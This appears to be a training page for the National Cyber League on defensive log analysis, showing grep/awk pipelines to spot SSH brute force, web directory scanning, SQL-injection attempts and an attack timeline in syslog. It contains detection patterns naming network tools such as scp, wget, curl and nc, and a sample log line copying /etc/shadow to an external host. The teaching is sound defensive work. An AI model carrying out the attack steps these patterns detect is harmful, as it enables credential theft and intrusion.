NCL: Log Analysis
Detecting attacks and anomalies in system logs using grep, awk, and sort
Log Analysis
Log analysis challenges give you server log files and ask you to identify attackers, compromised accounts, and malicious activity. This is where your Unix command-line skills from Weeks 1-2 directly translate to cybersecurity — grep, awk, sort, uniq, and cut are the primary tools.
This page covers the three log types tested in NCL: SSH authentication logs, web server access logs, and system logs (syslog). Each section shows the log format, the questions NCL asks, and the exact commands to answer them.
1. SSH Authentication Logs
SSH logs record every login attempt — successful and failed. On Linux, these are in /var/log/auth.log (Debian/Ubuntu) or /var/log/secure (RHEL/CentOS).
Log format
A typical SSH log entry:
Mar 15 14:23:05 webserver sshd[12345]: Failed password for admin from 192.168.1.100 port 54321 ssh2
Fields: date time hostname process[PID]: message
Common NCL questions and commands
“What is the server hostname?”
grep "sshd" auth.log | head -1 | awk '{print $4}'
“What IP addresses attempted brute force attacks?”
# Count failed attempts per IP, sort by frequency
grep "Failed password" auth.log | awk '{print $11}' | sort | uniq -c | sort -rn | head
The output shows IPs ranked by number of failed attempts. An IP with hundreds of failures is conducting a brute force attack.
“What username was targeted?”
grep "Failed password" auth.log | awk '{print $9}' | sort | uniq -c | sort -rn | head
“Which IP successfully authenticated?”
grep "Accepted password" auth.log | awk '{print $11}' | sort -u
The field positions ($9, $11) depend on the log format. If the output looks wrong, adjust by examining a sample line: grep "Failed password" auth.log | head -1.
Checkpoint: A log shows 500 "Failed password for root" entries from 10.0.0.5, followed by one "Accepted password for root" from 10.0.0.5. What happened?
A successful brute force attack. The attacker tried 500 passwords and eventually guessed correctly. The single “Accepted” entry after hundreds of failures is the compromise. You would report 10.0.0.5 as the attacker IP and note that the root account was compromised.
2. Web Server Access Logs
Apache and Nginx log every HTTP request in Combined Log Format:
192.168.1.50 - - [15/Mar/2025:14:23:05 +0000] "GET /login HTTP/1.1" 200 1234 "https://google.com" "Mozilla/5.0"
Fields: IP - - [timestamp] "method path protocol" status size "referer" "user-agent"
Common NCL questions and commands
“Which IP made the most requests?” (potential DDoS or scanning)
awk '{print $1}' access.log | sort | uniq -c | sort -rn | head
“What paths returned 404?” (directory scanning/enumeration)
grep '" 404 ' access.log | awk '{print $7}' | sort | uniq -c | sort -rn | head
“Were there SQL injection attempts?”
grep -iE "union|select|drop|1=1|'--|;--" access.log
“What user agents are unusual?” (bot identification)
awk -F'"' '{print $6}' access.log | sort | uniq -c | sort -rn | head
The -F'"' flag sets the field separator to double quotes, which correctly parses the quoted fields in Combined Log Format.
Checkpoint: You see 200 requests for paths like /admin, /wp-admin, /phpmyadmin, /login, /.env from a single IP, all returning 404. What is this?
Automated directory enumeration (also called directory brute forcing). The attacker is using a tool like dirb or gobuster to find hidden admin panels and configuration files. The 404 responses indicate the paths don’t exist on this server, but the scanning itself is hostile activity.
3. System Logs (syslog)
Syslog entries cover system-wide events: service starts/stops, user account changes, sudo commands, cron jobs, and kernel messages.
Format
Mar 15 14:23:05 hostname process[PID]: message
Incident timeline reconstruction
In NCL, syslog challenges often ask you to reconstruct an attack timeline. The key events to search for:
Initial access:
grep "Accepted\|session opened" syslog | head
Privilege escalation:
grep "sudo" syslog | awk '{print $1, $2, $3, $5, $6}'
Persistence (new accounts):
grep "useradd\|adduser\|usermod" syslog
Data exfiltration:
grep "scp\|wget\|curl\|nc " syslog
Service manipulation:
grep "systemctl\|service.*start\|service.*stop" syslog
Checkpoint: Syslog shows: (1) "Accepted password for www-data" at 02:15, (2) "sudo: www-data : command=/bin/bash" at 02:16, (3) "useradd backdoor" at 02:17, (4) "scp /etc/shadow 10.0.0.99" at 02:18. Describe the attack.
- Initial access at 02:15 — attacker compromised the www-data account (a web service account that should never have SSH access)
- Privilege escalation at 02:16 — www-data used sudo to get a root shell
- Persistence at 02:17 — attacker created a backdoor user account
- Exfiltration at 02:18 — attacker copied the password hash file to an external server
This is a textbook attack chain: access → escalation → persistence → exfiltration, all within 3 minutes.
4. Log Analysis Patterns
Regardless of log type, the same sort | uniq -c | sort -rn pipeline answers most frequency questions:
# Generic pattern: extract field, count, rank
COMMAND_TO_EXTRACT_FIELD | sort | uniq -c | sort -rn | head
sort— groups identical lines together (required beforeuniq)uniq -c— counts consecutive identical linessort -rn— sorts numerically in reverse (highest count first)head— shows only the top results
This pipeline works for IPs, usernames, paths, user agents, or any repeated field.
Time-based analysis
To filter log entries by time range:
# Entries between 14:00 and 15:00
grep "14:[0-5][0-9]:" auth.log
# Entries on March 15
grep "Mar 15" auth.log
# Entries outside business hours (before 6 AM or after 10 PM)
awk '{split($3,t,":"); if (t[1]<6 || t[1]>22) print}' auth.log
Resources
Practice: Blue Team Labs Online (free tier with log challenges) · Splunk BOTS (real-world SOC scenarios)
Reference: Apache Log Format · SSH Log Analysis